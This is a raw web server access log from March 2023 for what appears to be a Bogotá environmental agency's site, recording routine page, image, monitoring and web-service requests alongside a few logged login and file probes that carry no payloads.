172.22.2.4 - - [17/Mar/2023:01:28:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
192.168.175.240 - - [17/Mar/2023:01:30:48 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [17/Mar/2023:01:30:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41766
201.245.192.253 - - [17/Mar/2023:01:30:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42744
64.124.8.41 - - [17/Mar/2023:01:31:20 -0500] "GET /portaldeninos/home-2-3/feed/ HTTP/1.1" 304 -
192.168.175.240 - - [17/Mar/2023:01:31:48 -0500] "GET / HTTP/1.1" 200 4720
199.16.157.180 - - [17/Mar/2023:01:32:46 -0500] "GET /images/Sello%201%20JA-2.jpeg HTTP/1.1" 200 42236
192.168.175.240 - - [17/Mar/2023:01:32:48 -0500] "GET / HTTP/1.1" 200 4720
4.246.124.237 - - [17/Mar/2023:01:33:20 -0500] "-" 408 -
201.245.192.253 - - [17/Mar/2023:01:33:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
66.249.65.221 - - [17/Mar/2023:01:33:39 -0500] "-" 408 -
216.245.221.92 - - [17/Mar/2023:01:33:46 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [17/Mar/2023:01:33:48 -0500] "GET / HTTP/1.1" 200 4720
185.119.81.96 - - [17/Mar/2023:01:34:46 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.96 - - [17/Mar/2023:01:34:47 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
192.168.175.240 - - [17/Mar/2023:01:34:48 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Mar/2023:01:33:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [17/Mar/2023:01:35:48 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Mar/2023:01:34:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
192.168.175.240 - - [17/Mar/2023:01:36:48 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:01:37:48 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Mar/2023:01:38:26 -0500] "GET /BLA/boletinlegal/db.sql HTTP/1.1" 404 1018
4.246.124.237 - - [17/Mar/2023:01:38:30 -0500] "-" 408 -
201.245.192.253 - - [17/Mar/2023:01:38:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [17/Mar/2023:01:38:46 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [17/Mar/2023:01:38:48 -0500] "GET / HTTP/1.1" 200 4720
34.141.163.21 - - [17/Mar/2023:01:39:11 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
66.249.65.221 - - [17/Mar/2023:01:39:40 -0500] "-" 408 -
192.168.175.240 - - [17/Mar/2023:01:39:48 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:01:40:48 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [17/Mar/2023:01:40:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41766
201.245.192.253 - - [17/Mar/2023:01:40:53 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [17/Mar/2023:01:40:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42744
172.22.2.4 - - [17/Mar/2023:01:39:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
34.90.46.236 - - [17/Mar/2023:01:41:19 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
192.168.175.240 - - [17/Mar/2023:01:41:48 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Mar/2023:01:40:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
192.168.175.240 - - [17/Mar/2023:01:42:48 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [17/Mar/2023:01:43:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [17/Mar/2023:01:43:46 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [17/Mar/2023:01:43:48 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:01:44:48 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:01:45:48 -0500] "GET / HTTP/1.1" 200 4720
51.159.152.255 - - [17/Mar/2023:01:45:59 -0500] "GET / HTTP/1.1" 200 319
51.159.152.255 - - [17/Mar/2023:01:45:59 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
192.168.175.240 - - [17/Mar/2023:01:46:48 -0500] "GET / HTTP/1.1" 200 4720
66.220.149.6 - - [17/Mar/2023:01:46:48 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
172.22.2.4 - - [17/Mar/2023:01:45:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Mar/2023:01:46:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
192.168.175.240 - - [17/Mar/2023:01:47:48 -0500] "GET / HTTP/1.1" 200 4720
185.119.81.105 - - [17/Mar/2023:01:48:30 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [17/Mar/2023:01:48:31 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [17/Mar/2023:01:48:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [17/Mar/2023:01:48:46 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [17/Mar/2023:01:48:48 -0500] "GET / HTTP/1.1" 200 4720
69.171.249.2 - - [17/Mar/2023:01:49:38 -0500] "GET /images/idpyba-4-marzo-1_optimized.jpeg HTTP/1.1" 200 115318
69.171.249.12 - - [17/Mar/2023:01:49:39 -0500] "GET /images/empresas-alertas_optimized.jpeg HTTP/1.1" 200 142365
69.171.249.5 - - [17/Mar/2023:01:49:44 -0500] "GET /images/20%20de%20febrero%20panor\xc3\xa1mica%20de%20Bogot\xc3\xa1%20(1)%20(1).jpeg HTTP/1.1" 404 1034
69.171.249.10 - - [17/Mar/2023:01:49:44 -0500] "GET /images/17%20de%20febrero%20mujeres%20que%20reverdecen.jpeg HTTP/1.1" 200 85735
69.171.249.112 - - [17/Mar/2023:01:49:44 -0500] "GET /images/calidad-aire-2-marzo-1_optimized.jpeg HTTP/1.1" 200 51562
69.171.249.5 - - [17/Mar/2023:01:49:44 -0500] "GET /images/Puntos%20calientes%2024%20de%20febrero.jpeg HTTP/1.1" 200 42626
69.171.249.4 - - [17/Mar/2023:01:49:45 -0500] "GET /images/camino-a-los-cerros-1_optimized.jpeg HTTP/1.1" 200 222279
69.171.249.9 - - [17/Mar/2023:01:49:46 -0500] "GET /images/24%20de%20febrero%20Sendero%20guadalupe%202.jpeg HTTP/1.1" 200 70964
69.171.249.14 - - [17/Mar/2023:01:49:46 -0500] "GET /images/Sello%201%20JA-2.jpeg HTTP/1.1" 200 42236
69.171.249.14 - - [17/Mar/2023:01:49:46 -0500] "GET /images/28%20de%20febrero%20operativo.jpeg HTTP/1.1" 200 62220
69.171.249.17 - - [17/Mar/2023:01:49:46 -0500] "GET /images/Rmasar%2018%20de%20febrero%20Grupo.jpg HTTP/1.1" 200 68398
192.168.175.240 - - [17/Mar/2023:01:49:48 -0500] "GET / HTTP/1.1" 200 4720
69.171.249.10 - - [17/Mar/2023:01:49:50 -0500] "GET /images/Conversatorio%20aire%201%20(1).jpeg HTTP/1.1" 200 72040
69.171.249.10 - - [17/Mar/2023:01:49:50 -0500] "GET /images/WhatsApp%20Image%202023-02-15%20at%205.07.25%20PM.jpeg HTTP/1.1" 200 50573
192.168.175.240 - - [17/Mar/2023:01:50:48 -0500] "GET / HTTP/1.1" 200 4720
66.249.73.84 - - [17/Mar/2023:01:51:29 -0500] "-" 408 -
172.22.2.4 - - [17/Mar/2023:01:50:44 -0500] "OPTIONS /BLA/boletinlegal/ HTTP/1.1" 200 36811
192.168.175.240 - - [17/Mar/2023:01:51:48 -0500] "GET / HTTP/1.1" 200 4720
69.171.231.3 - - [17/Mar/2023:01:51:53 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
172.22.2.4 - - [17/Mar/2023:01:51:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [17/Mar/2023:01:52:48 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [17/Mar/2023:01:53:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
172.22.2.4 - - [17/Mar/2023:01:51:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55211
216.245.221.92 - - [17/Mar/2023:01:53:46 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [17/Mar/2023:01:53:48 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:01:54:48 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:01:55:48 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:01:56:48 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:01:57:48 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [17/Mar/2023:01:58:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
172.22.2.4 - - [17/Mar/2023:01:56:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
175.178.33.83 - - [17/Mar/2023:01:58:38 -0500] "GET /xmlrpc.php HTTP/1.1" 404 1034
216.245.221.92 - - [17/Mar/2023:01:58:46 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [17/Mar/2023:01:58:48 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Mar/2023:01:57:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55561
168.119.251.242 - - [17/Mar/2023:01:59:38 -0500] "GET / HTTP/1.1" 200 4720
168.119.251.242 - - [17/Mar/2023:01:59:39 -0500] "GET / HTTP/1.1" 200 319
192.168.175.240 - - [17/Mar/2023:01:59:48 -0500] "GET / HTTP/1.1" 200 4720
